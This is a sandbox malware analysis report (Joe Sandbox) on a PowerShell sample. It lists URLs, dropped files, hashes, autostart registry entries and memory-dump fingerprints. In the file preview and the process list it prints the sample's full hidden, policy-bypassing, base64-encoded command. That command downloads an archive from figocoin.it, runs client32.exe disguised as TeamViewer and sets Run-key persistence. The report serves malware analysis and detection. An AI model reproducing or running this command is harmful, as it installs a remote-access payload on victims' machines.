    unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        https://figocoin.it/auth.phppowershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.413701569.0000023C938B1000.00000004.00000800.00020000.00000000.sdmpfalse
        • 18%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        https://go.micropowershell.exe, 00000002.00000002.413701569.0000023C94DB3000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://contoso.com/powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://contoso.com/Licensepowershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://contoso.com/Iconpowershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.457788771.00000220DEC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.413701569.0000023C938B1000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                No contacted IP infos
                Joe Sandbox Version:37.1.0 Beryl
                Analysis ID:876993
                Start date and time:2023-05-28 09:30:17 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 52s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:6471bc8dac218.ps1
                Detection:MAL
                Classification:mal72.troj.evad.winPS1@4/8@0/0
                EGA Information:
                • Successful, ratio: 50%
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 93%
                • Number of executed functions: 17
                • Number of non-executed functions: 4
                Cookbook Comments:
                • Found application associated with file extension: .ps1
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, figocoin.it
                • Execution Graph export aborted for target powershell.exe, PID 2220 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                • Report size getting too big, too many NtReadFile calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                TimeTypeDescription
                09:32:03API Interceptor97x Sleep call for process: powershell.exe modified
                09:32:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run TeamViewer_3533 C:\Users\user\AppData\Roaming\TeamViewer_3533\client32.exe
                09:32:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run TeamViewer_3533 C:\Users\user\AppData\Roaming\TeamViewer_3533\client32.exe
                No context
                No context
                No context
                No context
                No context
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):24349
                Entropy (8bit):5.044789539417162
                Encrypted:false
                SSDEEP:384:1fib4GxVoGIpN6KQkj2Akjh4iUxGz75ard3GnaOdBQtAHkoNXp5XNSSmebvOjJEm:1IxV3IpNBQkj25h4iUxGz75ard3GnaOQ
                MD5:4CE762BE063FD056F19DFE6020C1C756
                SHA1:49898445B83E8FE02CCC1E2ACD47130CA237CC85
                SHA-256:E902C6A8B5ECD8371795819B77445FC3C233B1FA7FC423F97FD52F13EF394049
                SHA-512:699D2F7CC17E60B40C3DFC836AE6989E39DDF439A4ACA8A00EEF36CB028AEFFE8B88B545D6E50112B1C60AD78CCB5F26E27C3ADA1261967A873F26D418693FC2
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE.%..._t.....q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):0.9260988789684415
                Encrypted:false
                SSDEEP:3:Nlllulb/lj:NllUb/l
                MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                Malicious:false
                Preview:@...e................................................@..........
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):6205
                Entropy (8bit):3.758665470157352
                Encrypted:false
                SSDEEP:96:InyFoCrQ51pkvhkvCCtrF5ceVHLi5ceVHL1:5FL4FBydyg
                MD5:F77BFC3C8EFAB9840E4637A510E43069
                SHA1:929F6DACBBB2803007A5B78CA136CD6A0DC7C03D
                SHA-256:37D801F2B797E9BF18EF6C37B39E3CE37E7E628F55B158B658AC9F4529798026
                SHA-512:187E8CF1C63E1A49B3C208BD55117DAB5EAB4B2DE0A467D523A59FB2C192F8A51D3AF7F9379F514C071CFCA0B9ACD9945692A38590C5272A0E6D523B6DB30951
                Malicious:false
                Preview:...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-..0........;.......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..V.......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..V.......Y....................D1,.R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......Ny..V.......Y....................b5..M.i.c.r.o.s.o.f.t.....V.1......U....Windows.@.......Ny..U.......Y.......................W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..U.......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..U.......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny..U.......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):6205
                Entropy (8bit):3.758665470157352
                Encrypted:false
                SSDEEP:96:InyFoCrQ51pkvhkvCCtrF5ceVHLi5ceVHL1:5FL4FBydyg
                MD5:F77BFC3C8EFAB9840E4637A510E43069
                SHA1:929F6DACBBB2803007A5B78CA136CD6A0DC7C03D
                SHA-256:37D801F2B797E9BF18EF6C37B39E3CE37E7E628F55B158B658AC9F4529798026
                SHA-512:187E8CF1C63E1A49B3C208BD55117DAB5EAB4B2DE0A467D523A59FB2C192F8A51D3AF7F9379F514C071CFCA0B9ACD9945692A38590C5272A0E6D523B6DB30951
                Malicious:false
                Preview:...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-..0........;.......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..V.......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..V.......Y....................D1,.R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......Ny..V.......Y....................b5..M.i.c.r.o.s.o.f.t.....V.1......U....Windows.@.......Ny..U.......Y.......................W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..U.......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..U.......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny..U.......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........
                File type:Unicode text, UTF-8 (with BOM) text, with very long lines (2189)
                Entropy (8bit):4.334806861450021
                TrID:
                • Text - UTF-8 encoded (3003/1) 100.00%
                File name:6471bc8dac218.ps1
                File size:2219
                MD5:12838e82541973a0e63820a421d4b8f6
                SHA1:6cca7441a420f3d3082f6787abeb6c5a6d9ae99b
                SHA256:b146dd7f30d4ed7536f62fae414f34f45ca32173224ad3b4bc0a14651108b1ba
                SHA512:76af3fc336e9cc393ec1d978c62a5cb7be762c024c21038936e56c526a574495f168ea53d2229ff2304652f0866b873521119be06c714f313f0e3b2ea91d340f
                SSDEEP:48:LGfEFWuJqs9HZNjd+SfprcKyK0hE6S1FtfsC5P3RX5ZWiaoIhSNtV:LGfEFW87jd+Sfpbaq6S1FtfsC5P39Efs
                TLSH:A741CB7CCF69F8E0033DB0A088492E2620949E57D6B58E24D9574EE62D7C20ACF2B18C
                File Content Preview:...powershell -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBnAG8AYwBvAGkAbgAuAGkAdAAvAGEAdQB0AGgALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQB
                Icon Hash:3270d6baae77db44
                No network behavior found

                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:09:31:59
                Start date:28/05/2023
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\6471bc8dac218.ps1
                Imagebase:0x7ff776e60000
                File size:447488 bytes
                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                Target ID:1
                Start time:09:31:59
                Start date:28/05/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff745070000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:2
                Start time:09:32:02
                Start date:28/05/2023
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBnAG8AYwBvAGkAbgAuAGkAdAAvAGEAdQB0AGgALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAcgByAG4AdQBtAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAGMAaAByAHMAPQAnAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUgBTAFQAVQBWAFcAWABZAFoAJwA7ACAAJAByAHMAdAByAD0AJwAnADsAIAAkAHIAYQBuAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAcgBuAHUAbQA7ACAAJABpACsAKwApACAAewAkAHIAcwB0AHIAKwA9ACQAYwBoAHIAcwBbACQAcgBhAG4ALgBuAGUAeAB0ACgAMAAsACAAJABjAGgAcgBzAC4ATABlAG4AZwB0AGgAKQBdAH0AOwAgACQAcgB6AGkAcAA9ACQAcgBzAHQAcgArACcALgB6AGkAcAAnADsAIAAkAHAAYQB0AGgAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXAAnACsAJAByAHoAaQBwADsAIAAkAHAAegBpAHAAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABUAGUAYQBtAFYAaQBlAHcAZQByAF8AJwArACQAcgByAG4AdQBtADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAAJABwAGEAdABoACAALQBkAGUAcwB0AGkAbgBhAHQAaQBvAG4AcABhAHQAaAAgACQAcAB6AGkAcAA7ACAAJABGAE8ATABEAD0ARwBlAHQALQBJAHQAZQBtACAAJABwAHoAaQBwACAALQBGAG8AcgBjAGUAOwAgACQARgBPAEwARAAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAEgAaQBkAGQAZQBuACcAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACQAcABhAHQAaAA7ACAAYwBkACAAJABwAHoAaQBwADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAAJABmAHMAdAByAD0AJABwAHoAaQBwACsAJwBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcAOwAgACQAcgBuAG0APQAnAFQAZQBhAG0AVgBpAGUAdwBlAHIAXwAnACsAJAByAHIAbgB1AG0AOwAgAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAGUAIAAkAHIAbgBtACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=
                Imagebase:0x7ff776e60000
                File size:447488 bytes
                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                Reset < >
                  Memory Dump Source
                  • Source File: 00000000.00000002.471278725.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0e4e1aacf61e6ea4e56e6c628697e31ed2e6252dca63fed62396d70da26bac61
                  • Instruction ID: 8d9c78aad49841ecd04358ed8a7fa6b26eb04fb0f99c2ce447f6ebdfdd0a5804
                  • Opcode Fuzzy Hash: 0e4e1aacf61e6ea4e56e6c628697e31ed2e6252dca63fed62396d70da26bac61
                  • Instruction Fuzzy Hash: 61420770A1CA4D8FDB89DF2CC495AA977E1FF59310F1441BDD84AD72A6CA35E882C780
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.471278725.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6b71792abca8cfb18759b78c7513b2b5dcd91324a99e3aa85e0a1bc403c10775
                  • Instruction ID: cf26b36b352f17a49b4413dffcd1505f55fb829e29ca53a703f35ae1262c4658
                  • Opcode Fuzzy Hash: 6b71792abca8cfb18759b78c7513b2b5dcd91324a99e3aa85e0a1bc403c10775
                  • Instruction Fuzzy Hash: 35E104B280E7866FE712DB38E8D55E57FE0EF1321571C00FAD494C74A3DA16A896C3A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.471654869.00007FFBAC040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC040000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ffbac040000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 203b61e0a3159b43c1bb88faaede13bae2a5d64f1632430d097d10cfa771fb8d
                  • Instruction ID: 701407fcdf7c3b1c164c91de4325635b8ee5315c4807be6420ef27f05c2221c7
                  • Opcode Fuzzy Hash: 203b61e0a3159b43c1bb88faaede13bae2a5d64f1632430d097d10cfa771fb8d
                  • Instruction Fuzzy Hash: 08C128F1A0EA8A4FEBA6D77888595B67FA1EF55310F0800FAD84DC71D3DA18E816C351
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.471278725.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 25f27c6f28ccc3565e77a53780c00f7eac5b486c94bcd7111b271ecb3c11d635
                  • Instruction ID: 6c5d92310ace98198317a8da5613606f2ccf8a2e28fb84cd54de81ca649c4c2c
                  • Opcode Fuzzy Hash: 25f27c6f28ccc3565e77a53780c00f7eac5b486c94bcd7111b271ecb3c11d635
                  • Instruction Fuzzy Hash: 42B1F8B280E7865FE712CB78E8D15E57FA0FF1321572C00FAD495C64A3DA16B86AC360
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.471654869.00007FFBAC040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC040000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ffbac040000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ad61d7bbb6bd3810e3d54fce6e02face5dd7b64d3c2956923dddb0d5989064ea
                  • Instruction ID: 99f730b285f61aa1f0499cc97fb3f67c5137ac9b06b9bae31f107ff9161b5c08
                  • Opcode Fuzzy Hash: ad61d7bbb6bd3810e3d54fce6e02face5dd7b64d3c2956923dddb0d5989064ea
                  • Instruction Fuzzy Hash: 8551F3F6A0E68A4FEFABD77889681797B91AF15240F1800FAC84DCB1D3CA18EC55C315
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.471278725.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e72e9ed31a3fc35c63aedfaefe78aaaf1d1a3c3077043213a23c0c5968bc92a9
                  • Instruction ID: cf434e84879ddba92cb2e14e23a774facad1a486cf40311850d121f7c2559d05
                  • Opcode Fuzzy Hash: e72e9ed31a3fc35c63aedfaefe78aaaf1d1a3c3077043213a23c0c5968bc92a9
                  • Instruction Fuzzy Hash: CE01677115CB0C4FDB48EF0CE451AA6B7E0FB95324F10056DE58AC3661DA36E892CB45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.471278725.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2ed0c7d59f641ab1d145f30d9d048c782422b52418399bc47c239112e0cdfc4d
                  • Instruction ID: b50496350f9b0ac77a954c48fd7bd2b2bf204efbddf457a4742999b04a8215f0
                  • Opcode Fuzzy Hash: 2ed0c7d59f641ab1d145f30d9d048c782422b52418399bc47c239112e0cdfc4d
                  • Instruction Fuzzy Hash: 3CF0373275C6044FDB4CAA1CF4429B573D1E799321B00016EE48BC2697D927E8438685
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.471278725.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e3f4f11903e7bff0d8f3fdd3afcf2c100a3fba2543a5fbf3067ffa9064ee9bdd
                  • Instruction ID: 22cce13173ba20ba3bf41b4b781ba555b071aecc93914b0137f62f01aa080995
                  • Opcode Fuzzy Hash: e3f4f11903e7bff0d8f3fdd3afcf2c100a3fba2543a5fbf3067ffa9064ee9bdd
                  • Instruction Fuzzy Hash: 96F0303275C6088FDB4CEA1CF8829B573E1EB99324B00056EE48BC3657D926E847CA85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:6.1%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:8
                  Total number of Limit Nodes:0
                  execution_graph 12086 7ffbabf771b0 12087 7ffbabf771be 12086->12087 12088 7ffbabf771fb 12087->12088 12089 7ffbabf771c8 RtlEncodePointer 12087->12089 12089->12088 12082 7ffbabf8a020 12083 7ffbabf8a02e 12082->12083 12084 7ffbabf8a038 RtlDecodePointer 12083->12084 12085 7ffbabf8a06b 12083->12085 12084->12085

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 470 7ffbabf7aa2a-7ffbabf7aa2b 471 7ffbabf7aa2d-7ffbabf7aa64 470->471 472 7ffbabf7aa75-7ffbabf7aabc call 7ffbabf75fb8 470->472 471->472 479 7ffbabf7aabe-7ffbabf7aae1 472->479 480 7ffbabf7aae8-7ffbabf7ab0f 472->480 479->480 485 7ffbabf7ab11-7ffbabf7ab1f 480->485 486 7ffbabf7ab20-7ffbabf7ab25 480->486 487 7ffbabf7ab48-7ffbabf7ab55 486->487 488 7ffbabf7ab27-7ffbabf7ab45 486->488 489 7ffbabf7ab5b-7ffbabf7ab65 487->489 490 7ffbabf7b2a5-7ffbabf7b2ad 487->490 488->487 492 7ffbabf7abaa 489->492 493 7ffbabf7ab67-7ffbabf7ab83 call 7ffbabf75028 489->493 494 7ffbabf7b2af-7ffbabf7b2b7 490->494 495 7ffbabf7b306-7ffbabf7b315 490->495 500 7ffbabf7abaf 492->500 493->500 502 7ffbabf7ab85-7ffbabf7ab8f 493->502 497 7ffbabf7b2b9-7ffbabf7b2ca 494->497 498 7ffbabf7b2e8-7ffbabf7b2ff call 7ffbabf760c8 494->498 505 7ffbabf7b2cc-7ffbabf7b2d5 call 7ffbabf760b8 497->505 506 7ffbabf7b2e3 497->506 498->495 504 7ffbabf7abb1-7ffbabf7abbb 500->504 502->492 507 7ffbabf7ab91-7ffbabf7aba8 call 7ffbabf75028 502->507 509 7ffbabf7abc1-7ffbabf7abcb 504->509 510 7ffbabf7accc-7ffbabf7accf 504->510 519 7ffbabf7b2da-7ffbabf7b2e1 505->519 506->498 507->504 509->492 516 7ffbabf7abcd-7ffbabf7abe8 509->516 513 7ffbabf7adba-7ffbabf7adbc 510->513 514 7ffbabf7acd5-7ffbabf7acdf 510->514 517 7ffbabf7adc2-7ffbabf7adce 513->517 518 7ffbabf7af68-7ffbabf7af7b 513->518 514->492 521 7ffbabf7ace5-7ffbabf7ad0f 514->521 524 7ffbabf7abea-7ffbabf7ac11 516->524 525 7ffbabf7ac17-7ffbabf7ac2f 516->525 526 7ffbabf7ae31 517->526 527 7ffbabf7add0-7ffbabf7ae30 517->527 532 7ffbabf7af7d-7ffbabf7af89 518->532 533 7ffbabf7afa7-7ffbabf7afe9 518->533 519->495 545 7ffbabf7ad11-7ffbabf7ad34 521->545 546 7ffbabf7ad3b-7ffbabf7ad3c 521->546 524->510 524->525 540 